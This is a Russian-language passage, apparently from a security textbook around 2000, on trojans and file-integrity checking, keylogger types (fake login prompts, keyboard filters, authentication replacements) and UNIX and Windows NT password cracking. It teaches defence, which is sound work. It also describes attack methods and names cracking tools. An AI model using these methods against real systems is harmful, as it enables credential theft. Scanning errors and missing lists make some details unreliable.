Таким образом, троянские программы встречаются довольно часто и, следовательно, представляют серьезную угрозу безопасности компьютерных систем. Даже после того как троянская программа обнаружена, ее вредоносное влияние на компьютерную систему может ощущаться еще в течение очень длительного времени. Ведь зачастую никто не может с уверенностью сказать, насколько сильно пострадала компьютерная система в результате проникновения в нее троянской программы.
Дело в том, что большинство троянцев являются частью других программ, которые хранятся в компьютере в откомпилированном виде. Текст этих программ представляет собой последовательность команд на машинном языке, состоящую из нулей и единиц. Рядовой пользователь, как правило, не имеет ни малейшего понятия о внутренней структуре таких программ. Он просто запускает их на исполнение путем задания имени соответствующей программы в командной строке или двойным щелчком на имени ее файла.
Когда выясняется, что в какую-то откомпилированную программу проник троянец, в сети Internet немедленно начинают распространяться бюллетени с информацией об обнаруженном троянце. Чаще всего в этих бюллетенях кратко сообщается о том, какой вред может причинить данный троянец и где можно найти замену пораженной троянцем программе.
Иногда ущерб, который может нанести троянец, оценить довольно легко. Например, если он предназначен для пересылки по электронной почте содержимого файла /etc/passwd, в котором операционные системы семейства UNIX хранят информацию о пользовательских паролях, достаточно установить "чистую" версию программы взамен той, в которой обосновался этот троянец. Затем пользователи должны будут обновить свои пароли, и на этом борьба с ним успешно завершается.
Однако далеко не всегда степень компрометации компьютерной системы, в которой поселилась троянская программа, бывает так легко определить. Предположим, что цель внедрения троянца состоит в создании дыры в защитных механизмах компьютерной системы, через которую злоумышленник сможет, например, проникать в нее, имея администраторские полномочия. И если взломщик окажется достаточно хитрым и смекалистым, чтобы замести следы своего присутствия в системе путем внесения соответствующих изменений в регистрационные файлы, то определить, насколько глубоко он проник сквозь системные защитные механизмы, будет почти невозможно, если учесть еще тот факт, что саму троянскую программу обнаружат лишь несколько месяцев спустя после ее внедрения в компьютерную систему. В этом случае может понадобиться целиком переустановить операционную систему и все приложения.
Как распознать троянскую программу
большинство программных средств, предназначенных для защиты от троянских программ, в той или иной степени использует так называемое согласование объектов. При этом в качестве объектов фигурируют файлы и каталоги, а согласование представляет собой способ ответить на вопрос. изменились ли файлы и каталоги с момента последней проверки. В ходе согласования характеристики объектов сравниваются с характеристиками. которыми они обладали раньше. Берется, к примеру, архивная копия системного файла и ее атрибуты сравниваются с атрибутами этого файла, который в настоящий момент находится на жестком диске. Если атрибуты различаются и никаких изменений в операционную систему не вносилось, значит в компьютер, скорее всего, проник троянец.
Одним из атрибутов любого файла является отметка о времени его последней модификации: всякий раз, когда файл открывается, изменяется и сохраняется на диске, автоматически вносятся соответствующие поправки. Однако отметка времени не может служить надежным индикатором наличия в системе троянца. Дело в том, что ею очень легко манипулировать. Можно подкрутить назад системные часы, внести изменения в файл, затем снова вернуть часы в исходное состояние, и отметка о времени модификации файла останется неизменной.
Может быть, иначе обстоит дело с размером файла? Отнюдь. Нередко текстовый файл, который изначально занимал, скажем, 8 Кбайт дискового пространства, после редактирования и сохранения имеет тот же самый размер. Несколько иначе ведут себя двоичные файлы. Вставить в чужую программу фрагмент собственного кода так, чтобы она не утратила работоспособности и в откомпилированном виде сохранила свой размер, достаточно непросто. Поэтому размер файла является более надежным показателем, чем отметка о времени внесения в него последних изменений.
Злоумышленник, решивший запустить в компьютер троянца, обычно пытается сделать его частью системного файла. Такие файлы входят в дистрибутив операционной системы и их присутствие на любом компьютере, где эта операционная система установлена, не вызывает никаких подозрений. Однако любой системный файл имеет вполне определенную длину. Если данный атрибут будет каким-либо образом изменен, это встревожит пользователя.
Зная это, злоумышленник постарается достать исходный текст соответствующей программы и внимательно проанализирует его на предмет присутствия в нем избыточных элементов, которые могут быть удалены безо всякого ощутимого ущерба. Тогда вместо найденных избыточных элементов он вставит в программу своего троянца и перекомпилирует ее заново. Если размер полученного двоичного файла окажется меньше или больше размера исходного, процедура повторяется. И так до тех пор, пока не будет получен файл, размер которого в наибольшей степени близок к оригиналу (если исходный файл достаточно большой, этот процесс может растянуться на несколько дней).
Итак, в борьбе с троянцами положиться на отметку о времени последней модификации файла и его размер нельзя, поскольку злоумышленник может их довольно легко подделать. Более надежной в этом отношении является так называемая контрольная сумма файла. Для ее подсчета элементы файла суммируются, и получившееся в результате число объявляется его контрольной суммой. Например, в операционной системе SunOS существует специальная утилита sum, которая выводит на устройство стандартного вывода STDOUT контрольную сумму файлов, перечисленных в строке аргументов этой утилиты.
Однако и контрольную сумму в общем случае оказывается не так уж трудно подделать. Поэтому для проверки целостности файловой системы компьютера используется особая разновидность алгоритма вычисления контрольной суммы, называемая односторонним хэшированием.
Функция хэширования называется односторонней, если задача отыскания двух аргументов, для которых ее значения совпадают, является труднорешаемой. Отсюда следует, что функция одностороннего хэширования может быть применена для того, чтобы отслеживать изменения, вносимые злоумышленником в файловую систему компьютера, поскольку попытка злоумышленника изменить какой-либо файл так, чтобы значение, полученное путем одностороннего хэширования этого файла, осталось неизменным, обречена на неудачу.
Исторически сложилось так, что большинство утилит, позволяющих бороться с проникновением в компьютерную систему троянских программ путем однонаправленного хэширования файлов, было создано для операционных систем семейства UNIX. Одной из наиболее удобных в эксплуатации и эффективных является утилита Trip Wire, которую можно найти в Internet по адресу http://www.tripwiresecurity.com/. Она позволяет производить однонаправленное хэширование файлов при помощи нескольких алгоритмов, в том числе — MD43, MD54 и SHA5. Вычисленные хэш-значения файлов хранятся в специальной базе данных, которая, в принципе, является самым уязвимым звеном \ утилиты TripWire. Поэтому пользователям TripWire предлагается в обязательном порядке принимать дополнительные меры защиты, чтобы исключить доступ к этой базе данных со стороны злоумышленника (например, помещать ее на съемном носителе, предназначенном только для чтения).
Рис. 2.5. Окно антивирусной программы Norton Antivirus 2000
Средства борьбы с троянцами в операционных системах семейства Windows (95/98/NT) традиционно являются частью их антивирусного программною обеспечения. Поэтому, чтобы отлавливать Back Orifice, Net Bus, SubSeven и другие подобные им троянские программы, необходимо обзавестись самым современным антивирусом (например, программой Norton Anuvirus 2000 компании Symantec (рис. 2.1), которая позволяет обнаруживать присутствие в компьютерной системе наиболее распространенных троянцев и избавляться от них). Следует регулярно проверять свой компьютер на присутствие в нем вирусов.
Тем, кто хочет иметь в своем распоряжении утилиту, предназначенную именно для обнаружения троянцев в компьютерах, которые работают под управлением операционных систем семейства Windows, можно посоветовать обратить свои взоры на программу The Cleaner компании MooSoft Development (http://www.homestead.com/moosoft/ cleaner.html) Эта утилита может быть с успехом использована для борьбы с более чем четырьмя десятками разновидностей троянских программ.
Обзор средств борьбы с троянскими программами был бы далеко не полным, если обойти вниманием недавно появившиеся на рынке программные пакеты, предназначенные для комплексной зашиты от угроз, с которыми сталкиваются пользователи настольных компьютеров при работе в Internet. Одним из таких пакетов является eSafe Protect компании Aladdin Knowledge Systems (демонстрационную версию eSafe Protect можно найти в Internet no адресу www.esafe.com).
Функционально eSafe Protect делится на три компонента — антивирус, персональный брандмауэр и модуль защиты компьютерных ресурсов. Антивирус избавляет компьютер от вредоносных программ благодаря применению антивирусного модуля VisuSafe, сертифицированного американским Национальным агентством компьютерной безопасности. Персональный брандмауэр контролирует весь входящий и исходящий трафик по протоколу TCP/IP, наделяя используемые IP-адреса определенными правами (например, ограничивая доступ в Internet в определенные часы или запрещая посещение некоторых Web-узлов).
Для защиты ресурсов компьютера, на котором установлен программный пакет eSafe Protect, создается специальная изолированная область — так называемая песочница. Все автоматически загружаемые из Internet Java-аплсты и компоненты ActiveX сначала помещаются в "песочницу", где они находятся под неусыпным наблюдением eSafe Protect. Если попавшая в "песочницу" программа попытается выполнить какое-либо недозволенное действие, то оно будет немедленно блокировано. В течение заданного интервала времени (от 1 до 30 дней) каждое приложение, загруженное в компьютер из Internet. проходит "карантинную" проверку в "песочнице". Полученная в холе такой проверки информация заносится в особый журнал. По истечении "карантина" приложение будет выполняться вне "песочницы", однако ему будут дозволены только те действия, перечень которых определяется на основе имеющихся журнальных записей.
Таким образом, по сравнению с другими подобными программными пакетами eSafe Protect обеспечивает наиболее развитые и эффективные средства комплексной зашиты от троянских программ. Входящий в состав eSafe Protect антивирус помогает быстро выявлять троянцев и расправляться с ними, используя технологии, которые хорошо зарекомендовали себя при борьбе с вирусами. Персональный брандмауэр блокирует любые попытки связаться извне с проникшими в компьютерную систему троянскими программами. И наконец с помощью "песочницы" своевременно предотвращается внедрение троянцев в компьютеры под видом Java-аплетов и компонентов ActiveX.
Одна из наиболее распространенных разновидностей программных закладок — клавиатурные шпионы. Такие программные закладки нацелены на перехват паролей пользователей операционной системы, а также на определение их легальных полномочий и прав доступа к компьютерным ресурсам.
Клавиатурные шпионы — явление отнюдь не новое в мире компьютеров. В свое время они разрабатывались и для OS/370, и для UNIX, и для DOS. Их поведение в общем случае является довольно традиционным: типовой клавиатурный шпион обманным путем завладевает пользовательскими паролями, а затем переписывает эти пароли туда, откуда их может без особого труда извлечь злоумышленник. Различия между клавиатурными шпионами касаются только способа, который применяется ими для перехвата пользовательских паролей. Соответственно все клавиатурные шпионы делятся на три типа — имитаторы, фильтры и заместители.
Имитаторы
Клавиатурные шпионы этого типа работают по следующему алгоритму. Злоумышленник внедряет в операционную систему программный модуль, который имитирует приглашение пользователю зарегистрироваться для того, чтобы войти в систему. Затем внедренный модуль (в принятой терминологии — имитатор) переходит в режим ожидания ввода пользовательского идентификатора и пароля. После того как пользователь идентифицирует себя и введет свой пароль, имитатор сохраняет эти данные там, где они доступны злоумышленнику. Далее имитатор инициирует выход из системы (что в большинстве случаев можно сделать программным путем), и в результате перед глазами у ничего не подозревающего пользователя появляется сто одно, но на этот раз уже настоящее приглашение для входа в систему.
Обманутый пользователь, видя, что ему предлагается еще раз внести пароль. приходит к выводу о том, что он допустил какую-то ошибку во время предыдущего ввода пароля, и послушно повторяет всю процедуру входи в систему заново. Некоторые имитаторы для убедительности выдают на экран монитора правдоподобное сообщение о якобы совершенной пользователем ошибке. Например, такое: "НЕВЕРНЫЙ ПАРОЛЬ. ПОПРОБУЙТЕ ЕЩЕ РАЗ".
Написание имитатора не требует от его создателя каких-либо особых навыков. Злоумышленнику, умеющему программировать на одном из универсальных языков программирования (к примеру, на языке BASIC), понадобятся на это считанные часы. Единственная трудность, с которой он может столкнуться, состоит в том, чтобы отыскать в документации соответствующую программную функцию, реализующую выход пользователя из системы.
Перехват пароля зачастую облегчают сами разработчики операционных систем, которые не затрудняют себя созданием усложненных по форме приглашений пользователю зарегистрироваться для входа в систему. Подобное пренебрежительное отношение характерно для большинства версий операционной системы UNIX, в которых регистрационное приглашение состоит из двух текстовых строк, выдаваемых поочередно на экран терминала:
login:
password:
Чтобы подделать такое приглашение, не нужно быть семи пядей во лбу. Однако само по себе усложнение внешнего вида приглашения не создает для хакера, задумавшего внедрить в операционную систему имитатор, каких-либо непреодолимых препятствий. Для этого требуется прибегнуть к более сложным и изощренным мерам защиты. В качестве примера операционной системы, в которой такие меры в достаточно полном объеме реализованы на практике, можно привести Windows NT.
Системный процесс WinLogon, отвечающий в операционной системе Windows NT за аутентификацию пользователей, имеет свой собственный рабочий стол — совокупность окон, одновременно видимых на экране дисплея. Этот рабочий стол называется столом аутентификации. Никакой другой Процесс, в том числе и имитатор, не имеет доступа к рабочему столу аутентификации и не может расположить на нем свое окно.
После запуска Windows NT на экране компьютера возникает так называемое начальное окно рабочего стола аутентификации, содержащее указание нажать на клавиатуре клавиши <Ctrl>+<Alt>+<Del>. Сообщение о нажатии этих клавиш передается только системному процессу WinLogon, а для остальных процессов, в частности, для всех прикладных программ, их нажатие происходит совершенно незаметно. Далее производится переключение на другое, так называемое регистрационное окно рабочего стола аутентификации. В нем-то как раз и размещается приглашение пользователю ввести свое идентификационное имя и пароль, которые будут восприняты и проверены процессом WinLogon.
Для перехвата пользовательского пароля внедренный в Windows NT имитатор обязательно должен уметь обрабатывать нажатие пользователем клавиш <Ctrl>+<Alt>+<Del>. В противном случае произойдет переключение на регистрационное окно рабочего стола аутентификации, имитатор станет неактивным и не сможет ничего перехватить, поскольку все символы пароля, введенные пользователем, минуют имитатор и станут достоянием исключительно системного процесса WinLogon. Как уже говорилось, процедура регистрации в Windows NT устроена таким образом, что нажатие клавиш <Ctrl>+<Alt>+<Del> проходит бесследно для всех процессов, кроме WinLogon, и поэтому пользовательский пароль поступит именно ему.
Конечно, имитатор может попытаться воспроизвести не начальное окно рабочего стола аутентификации (в котором высвечивается указание пользователю одновременно нажать клавиши <Ctrl>+<Alt>+<Del>), а регистрационное (где содержится приглашение ввести идентификационное имя и пароль пользователя). Однако при отсутствии имитаторов в системе регистрационное окно автоматически заменяется на начальное по прошествии короткого промежутка времени (в зависимости от версии Window NT он может продолжаться от 30 с до 1 мин), если в течение этого промежутка пользователь не предпринимает никаких попыток зарегистрироваться в системе. Таким образом, сам факт слишком долгого присутствия на экране регистрационного окна должен насторожить пользователя Windows NT и заставить его тщательно проверить свою компьютерную систему на предмет наличия в ней программных закладок.
Подводя итог сказанному, можно отметить, что степень защищенности Windows NT от имитаторов достаточно высока. Рассмотрение защитных механизмов, реализованных в этой операционной системе, позволяет сформулировать два необходимых условия, соблюдение которых является обязательным для обеспечения надежной защиты от имитаторов:
К сожалению, эти два условия ни в одной из операционных систем, за исключением Windows NT, не соблюдаются. Поэтому для повышения их защищенности от имитаторов можно порекомендовать воспользоваться административными мерами. Например, обязать каждого пользователя немедленно сообщать системному администратору, когда вход в систему оказывается невозможен с первого раза, несмотря на корректно заданное идентификационное имя и правильно набранный пароль.
Фильтры
Фильтры "охотятся" за всеми данными, которые пользователь операционной системы вводит с клавиатуры компьютера. Самые элементарные фильтры просто сбрасывают перехваченный клавиатурный ввод на жесткий диск или в какое-то другое место, к которому имеет доступ злоумышленник. Более, изощренные программные закладки этого типа подвергают перехваченные данные анализу и отфильтровывают информацию, имеющую отношение к пользовательским паролям.
Фильтры являются резидентными программами, перехватывающими одно или несколько прерываний, которые связаны с обработкой сигналов от клавиатуры. Эти прерывания возвращают информацию о нажатой клавише и введенном символе, которая анализируется фильтрами на предмет выявления данных, имеющих отношение к паролю пользователя.
Известны несколько фильтров, созданных специально для различных версий операционной системы DOS. В 1997 г. отмечено появление фильтров для операционных систем Windows 3.11 и Windows 95.
Надо сказать, что изготовить подобного рода программную закладку не составляет большого труда. В операционных системах Windows 3.11 и Windows 95/98 предусмотрен специальный программный механизм, с помощью Которого в них решается ряд задач, связанных с получением доступа к вводу с клавиатуры, в том числе и проблема поддержки национальных раскладок клавиатур. К примеру, любой клавиатурный русификатор для Windows представляет собой самый что ни на есть настоящий фильтр, поскольку призван перехватывать все данные, вводимые пользователем с клавиатуры компьютера. Нетрудно "доработать" его таким образом, чтобы вместе со своей основной функцией (поддержка национальной раскладки клавиатуры) он заодно выполнял бы и действия по перехвату паролей. Тем более, что но . многих учебных пособиях и руководствах пользователя операционных систем Windows имеются исходные тексты программных русификаторов клавиатуры. "Перепрофилировав" этот русификатор так, чтобы он взял на себя выполнение функций клавиатурного шпиона, его можно встроить перед настоящим русификатором или после него, и в результате вся информация. 4 вводимая пользователем с клавиатуры, пойдет и через клавиатурного шпиона. Таким образом задача создания фильтра становится такой простой, что не требует наличия каких-либо специальных знаний у злоумышленника. Ему остается только незаметно внедрить изготовленную им программную закладку в операционную систему и умело замаскировать ее присутствие.
В общем случае можно утверждать, что если в операционной системе разрешается переключать клавиатурную раскладку во время ввода пароля, то для этой операционной системы возможно создание фильтра. Поэтому, чтобы обезопасить ее от фильтров, необходимо обеспечить выполнение следующих трех условий:
Соблюсти первое из этих условий в локализованных для России версиях операционных систем принципиально невозможно. Дело в том, что средства создания учетных пользовательских записей на русском языке являются неотъемлемой частью таких систем. Только в англоязычных версиях систем Windows NT и UNIX предусмотрены возможности, позволяющие поддерживать уровень безопасности, при котором соблюдаются все 3 перечисленные условия.
Заместители
Заместители полностью или частично подменяют собой программные модули операционной системы, отвечающие за аутентификацию пользователей. Подобного рода клавиатурные шпионы могут быть созданы для работы в среде практически любой многопользовательской операционной системы. Трудоемкость написания заместителя определяется сложностью алгоритмов, реализуемых подсистемой аутентификации, и интерфейсов между ее отдельными модулями. Также при оценке трудоемкости следует принимать во внимание степень документированности этой подсистемы. В целом можно сказать, что задача создания заместителя значительно сложнее задачи написания имитатора или фильтра. Поэтому фактов использования подобного рода программных закладок злоумышленниками пока отмечено не было. Однако в связи с тем, что в настоящее время все большее распространение получает операционная система Windows NT, имеющая мощные средства защиты от имитаторов и фильтров, в самом скором будущем от хакеров следует ожидать более активного использования заместителей в целях получения несанкционированного доступа к компьютерным системам.
Поскольку заместители берут на себя выполнение функций подсистемы аутентификации, перед тем как приступить к перехвату пользовательских паролей они должны выполнить следующие действия:
Для того чтобы защитить систему от внедрения заместителя, ее администраторы должны строго соблюдать адекватную политику безопасности. И что особенно важно, подсистема аутентификации должна быть одним из самых защищенных элементов операционной системы. Однако, как показываем практика, администраторы, подобно всем людям, склонны к совершению ошибок. А следовательно, соблюдение адекватной политики безопасности в течение неограниченного периода времени является невыполнимой задачей. Кроме того, как только заместитель попал в компьютерную систему, любые меры зашиты от внедрения программных закладок перестают быть адекватными, и поэтому необходимо предусмотреть возможность использования эффективных средств обнаружения и удаления внедренных клавиатурных шпионов. Это значит, что администратор должен вести самый тщательный контроль целостности исполняемых системных файлов и интерфейсных функций, используемых подсистемой аутентификации для решения своих задач.
Но и эти меры могут оказаться недостаточно эффективными. Ведь машинный код заместителя выполняется в контексте операционной системы, и поэтому заместитель может предпринимать особые меры, чтобы максимально затруднить собственное обнаружение. Например, он может перехватывать системные вызовы, используемые администратором для выявления программных закладок, с целью подмены возвращаемой ими информации. Или фильтровать сообщения, регистрируемые подсистемой аудита, чтобы отсеивать те, которые свидетельствуют о его присутствии в компьютере.
Как защитить систему от клавиатурных шпионов
Клавиатурные шпионы представляют реальную угрозу безопасности современных компьютерных систем. Чтобы отвести эту угрозу, требуется реализовать целый комплекс административных мер и программно-аппаратных средств защиты. Надежная защита от клавиатурных шпионов может быть построена только тогда, когда операционная система обладает определенными возможностями, затрудняющими работу клавиатурных шпионов. Они были подробно описаны выше, и не имеет смысла снова на них останавливаться.
Однако необходимо еще раз отметить, что единственной операционной системой, в которой построение такой защиты возможно, является Windows NT.
Да и то с оговорками, поскольку все равно ее придется снабдить дополнительными программными средствами, повышающими степень ее защищенности. В частности, в Windows NT необходимо ввести контроль целостности системных файлов и интерфейсных связей подсистемы аутентификации.
Кроме того, для надежной защиты от клавиатурных шпионов администратор операционной системы должен соблюдать политику безопасности, при которой только администратор может:
И наконец, при организации защиты от клавиатурных шпионов всегда следует иметь в виду, что ни неукоснительное соблюдение адекватной политики безопасности, ни использование операционной системы, имеющей в своем составе средства, существенно затрудняющие внедрение клавиатурных шпионов и облегчающие их своевременное обнаружение, ни дополнительная реализация контроля за целостностью системных файловой и интерфейсных связей сами по себе не могут служить залогом надежной защиты информации в компьютере. Все эти меры должны осуществляться в комплексе. Ведь жертвой клавиатурного шпиона может стать любой пользователь операционной системы, поскольку ее администраторы тоже люди, время от времени и они допускают ошибки в своей работе, а для внедрения клавиатурного шпиона достаточно всего одной оплошности администратора.
Глава 3. Парольная защита операционных систем
Парольные взломщики
Проблему безопасности компьютерных сетей надуманной не назовешь. Практика показывает: чем масштабнее сеть и чем более ценная информация доверяется подключенным к ней компьютерам, тем больше находится желающих нарушить ее нормальное функционирование ради материальной выгоды или просто из праздного любопытства. В самой крупной компьютерной сети в мире (Internet) атаки на компьютерные системы возникают подобно волнам цунами, сметая все защитные барьеры и оставляя после себя впавшие в паралич компьютеры и опустошенные винчестеры. Эти атаки не знают государственных границ. Идет постоянная виртуальная война, в ходе которой организованности системных администраторов противостоит изобретательность компьютерных взломщиков.
Основным защитным рубежом против злонамеренных атак в компьютерной сети является система парольной защиты, которая имеется во всех современных операционных системах. В соответствии с установившейся практикой перед началом сеанса работы с операционной системой пользователь обязан зарегистрироваться, сообщив ей свое имя и пароль. Имя требуется операционной системе для идентификации пользователя, а пароль служит подтверждением правильности произведенной идентификации. Информация, введенная пользователем в диалоговом режиме, сравнивается с топ. что имеется в распоряжении операционной системы. Если проверка лает положительный результат, то пользователю становятся доступны все ресурсы операционной системы, связанные с его именем.
Что такое парольный взломщик
Трудно представить, что сегодня какому-нибудь злоумышленнику может придти в голову шальная мысль о том, чтобы попытаться подобрать имя и пароль для входа в операционную систему, по очереди перебирая в уме все возможные варианты и вводя их с клавиатуры. Скорость такого подбора пароля будет чрезвычайно низкой, тем более что в операционных системах с хорошо продуманной парольной защитой количество подряд идущих повторных вводов конкретного пользовательского имени и соответствующего ему пароля всегда можно ограничить двумя-тремя и сделать так, что если это число будет превышено, то вход в систему с использованием данного имени блокируется в течение фиксированного периода времени или до прихода системного администратора.
Гораздо более эффективным является другой метод взлома парольной защиты операционной системы, при котором атаке подвергается системный файл, содержащий информацию о ее легальных пользователях и их паролях. Однако любая современная операционная система надежно защищает при помощи шифрования пользовательские пароли, которые хранятся в этом файле. Доступ к таким файлам, как правило, по умолчанию запрещен даже для системных администраторов, не говоря уже о рядовых пользователях. Тем не менее, в ряде случаев злоумышленнику удается путем различных ухищрений получить в свое распоряжение файл с именами пользователей и их зашифрованными паролями. И тогда ему на помощь приходят так называемые парольные взломщики — специализированные программы, которые служат для взлома паролей операционных систем.
Как работает парольный взломщик
Криптографические алгоритмы, применяемые для шифрования паролей пользователей в современных операционных системах, в подавляющем большинстве случаев являются слишком стойкими, чтобы можно было надеяться отыскать методы их дешифрования, которые окажутся более эффективными, чем тривиальный перебор возможных вариантов. Поэтому парольные взломщики иногда просто шифруют все пароли с использованием того же самого криптографического алгоритма, который применяется для их засекречивания в атакуемой операционной системе, и сравнивают результаты шифрования с тем, что записано в системном файле, где находятся шифрованные пароли ее пользователей. При этом в качестве вариантов паролей парольные взломщики используют символьные последовательности, автоматически генерируемые из некоторого набора символов. Данный способ позволяет взломать все пароли, если известно их представление в зашифрованном виде и они содержат только символы из данного набора. Максимальное время, которое потребуется для взлома пароля, можно вычислить по следующей формуле:
где N — число символов в наборе, L — предельная длина пароля, S — количество проверок в секунду (зависит от операционной системы и быстродействия компьютера, на котором производится взлом ее парольной защиты).
Из приведенной формулы видно, что за счет очень большого числа перебираемых комбинаций, которое растет экспоненциально с увеличением чист символов в исходном наборе, такие атаки парольной защиты операционной системы могут занимать слишком много времени. Однако хорошо известно, что большинство пользователей операционных систем не затрудняют себя выбором стойких паролей (т. е. таких, которые трудно взломать). Поэтом) для более эффективного подбора паролей парольные взломщики обычно используют так называемые словари, представляющие собой заранее сформированный список слов, наиболее часто применяемых на практике в качестве паролей.
Для каждого слова из словаря парольный взломщик использует одно или несколько правил. В соответствии с этими правилами слово изменяется и порождает дополнительное множество опробуемых паролей. Производится попеременное изменение буквенного регистра, в котором набрано слово, порядок следования букв в слове меняется на обратный, в начало и в конец каждого слова приписывается цифра 1, некоторые буквы заменяются на близкие по начертанию цифры (в результате, например, из слова password получается pa55wOrd). Это повышает вероятность подбора пароля, поскольку в современных операционных системах, как правило, различаются пароли, набранные г заглавными и строчными буквами, а пользователям этих систем настоятельно рекомендуется выбирать пароли, в которых буквы чередуются с цифрами.
Одни парольные взломщики поочередно проверяют каждое слово из словаря, применяя к нему определенный набор правил для генерации дополнительного множества опробуемых паролей. Другие предварительно обрабатывают весь словарь при помощи этих же правил, получая новый словарь большего размера, и затем из него черпают проверяемые пароли. Учитывая, что обычные словари человеческих языков состоят всего из нескольких сотен тысяч слов, а скорость шифрования паролей достаточно высока, парольные взломщики, осуществляющие поиск с использованием словаря работают достаточно быстро.
Пользовательский интерфейс подавляющего большинства парольных взломщиков трудно назвать дружественным. После их запуска на экране Дисплея, как правило, появляется лаконичный запрос File?, означающий, что необходимо ввести имя файла, где хранится словарь. Да и документацию к парольным взломщикам обильной не назовешь. Правда, для этого есть свои объективные причины.
Во-первых, парольные взломщики предназначены исключительно для подбора паролей. Такая узкая специализация не способствует разнообразию их интерфейса и обилию сопроводительной документации.
Во-вторых, авторами большей части парольных взломщиков являются люди компьютерного подполья, которые создают их "на лету" для удовлетворения собственных сиюминутных потребностей, и поэтому редко снабжают их подробной документацией и встроенными справочными системами. Приятное исключение из этого правила составляют только парольные взломщики, созданные специалистами в области компьютерной безопасности для выявления слабостей в парольной защите операционных систем. В этом случае дистрибутив парольного взломщика, помимо самой программы, обязательно включает разнообразные дополнительные сведения, касающиеся технических сторон ее эксплуатации, а также небольшой словарь.
Взлом парольной защиты операционной системы UNIX
В операционной системе UNIX информацию о пароле любого пользователя можно отыскать в файле passwd, находящемся в каталоге etc. Эта информация хранится в зашифрованном виде и располагается через двоеточие сразу после имени соответствующего пользователя. Например, запись, сделанная в файле passwd относительно пользователя с именем bill, будет выглядеть примерно так:
bill:5fg63fhD3d5g:9406:12:Bill Spencer:/home/fsg/will:/bin/bash
Здесь 5fg63fhD3d5g — это и есть информация о пароле пользователя bill.
При первоначальном задании или изменении пользовательского пароля операционная система UNIX генерирует два случайных байта (в приведенном выше примере 5 и f) к которым добавляются байты пароля. Полученная в результате байтовая строка шифруется при помощи специальной криптографической процедуры Crypt2 (в качестве ключа используется пароль пользователя) и в зашифрованном виде (g63fliD3d5g) вместе с двумя случайными байтами (5f) записывается в файл /etc/passwd после имени пользователя и двоеточия.
Если злоумышленник имеет доступ к парольному файлу операционной системы UNIX, то он может скопировать этот файл на свой компьютер и затем воспользоваться одной из программ для взлома парольной защиты UNIX.
Самой эффективной и популярной такой программой является Crack. И хотя она предназначена для запуска на компьютерах, работающих только по.: управлением операционных систем семейства UNIX, инициируемый ею процесс поиска паролей может быть без особых усилий распределен междх различными платформами, подключенными к единой компьютерной сет. Среди них могут оказаться и IBM-совместимые персональные компьютеры , с операционной системой Linux, и рабочие станции RS/6000 с AIX. и Macintosh с A/UX.
CrackJack — еще одна известная программа для взлома паролей операционной системы UNIX. К сожалению, работает она только под управлением операционной системы DOS, но зато весьма непритязательна в том, что касается компьютерных ресурсов. К другим недостаткам этого парольною взломщика можно отнести запрет на одновременное использование сразу нескольких словарей и принципиальную невозможность запуска CrackJack под Windows 95/98.
В отличие от CrackJack, парольный взломщик PaceCrack95 работает пол Windows 95/98 в качестве полноценного DOS-приложения. К тому же он достаточно быстр, компактен и эффективен.
Парольные взломщики Q-Crack и John the Ripper примечательны тем, что существуют версии этих взломщиков, предназначенные для работы не только на DOS/Windows-платформах, но и на компьютерах с операционной системой Linux.
А парольный взломщик Hades лучше остальных документирован и содержит ряд очень полезных утилит, которые позволяют осуществлять слияние нескольких словарей в один большой словарь, удалять из словаря повторяющиеся слова и добавлять в уже имеющийся словарь пароли, взломанные в процессе работы Hades.
Существует множество других программ взлома паролей операционной системы UNIX. Они устойчивы к сбоям электропитания компьютеров, на которых работают (XiT), позволяют планировать время своей работы (Star Cracker), при выполнении монополизируют процессор для достижения максимальной производительности (Killer Cracker), не только взламывают пароли операционной системы UNIX, но и помогают преодолеть парольную защиту других программ, которые требуют, чтобы пользователь зарегистрировался путем ввода своего имени и соответствующего пароля (Claymore).
Что же касается защиты от взлома паролей операционной системы UNIX, то ее пользователям следует настоятельно порекомендовать применять только стойкие пароли, а в качестве критерия стойкости пароля использовать его отсутствие в словарях, предназначенных для парольных взломщиков. Да и сами файлы с информацией о пользовательских паролях следует прятать подальше от посторонних любопытных глаз. Достигается это обычно с помощью так называемого затенения (shadowing), когда в файле passwd шифрованные пароли пользователей заменяются служебными символами (например, звездочками), а вся парольная информация скрывается в каком-нибудь укромном месте. И хотя существуют программы, специально созданные для отыскания спрятанных парольных файлов операционной системы UNIX, к счастью для системных администраторов эти программы далеко не универсальны и успешно срабатывают не для всех операционных систем семейства UNIX.
Взлом парольной защиты операционной системы Windows NT
База данных учетных записей пользователей
Одним из основных компонентов системы безопасности Windows NT является диспетчер учетных записей пользователей. Он обеспечивает взаимодействие других компонентов системы безопасности, приложений и служб Windows NT с базой данных учетных записей пользователей (Security Account Management Database, SAM). Эта база обязательно имеется на каждом компьютере с операционной системой Windows NT. В ней хранится вся информация, используемая для аутентификации пользователей Windows NT при интерактивном входе в систему и при удаленном доступе к ней по компьютерной сети.
База данных SAM представляет собой один из кустов (hive) системного реестра (registry) Windows NT. Этот куст принадлежит ветви (subtree) HKEY_LOCAL_MACHINE и называется SAM. Он располагается в каталоге \wmnt_root\System32\ConfIg (winnt_root — условное обозначение каталога с системными файлами Windows NT) в отдельном файле, который тоже называется SAM.
Информация в базе данных SAM хранится в основном в двоичном виде. Доступ к ней обычно осуществляется через диспетчер учетных записей. Изменять записи, находящиеся в базе данных SAM, при помощи программ, позволяющих напрямую редактировать реестр Windows NT (REGEDT или REGEDT32), не рекомендуется. По умолчанию этого и нельзя делать, т. к. доступ к базе данных SAM запрещен для всех без исключения категорий пользователей операционной системы Windows NT.
Хранение паролей пользователей
Именно в учетных записях базы данных SAM находится информация о пользовательских именах и паролях, которая необходима для идентификации и аутентификации пользователей при их интерактивном входе в систему. Как и в любой другой современной многопользовательской операционной системе, эта информация хранится в зашифрованном виде. В базе данных SAM каждый пароль пользователя обычно бывает представлен в виде двух 16-байтовых последовательностей, полученных разными методами.
При использовании первого метода строка символов пользовательского пароля хэшируется с помощью функции MD4. В итоге из символьного пароля, введенного пользователем, получается 16-байтовая последовательность — хэшированный пароль Windows NT. Данная последовательность затем шифруется по DES-алгоритму5, и результат шифрования сохраняется в базе данных SAM. При этом в качестве ключа используется так называемый относительный идентификатор пользователя (Relative Identifier, RID), который представляет собой автоматически увеличивающийся порядковый номер учетной записи данного пользователя в базе данных SAM.
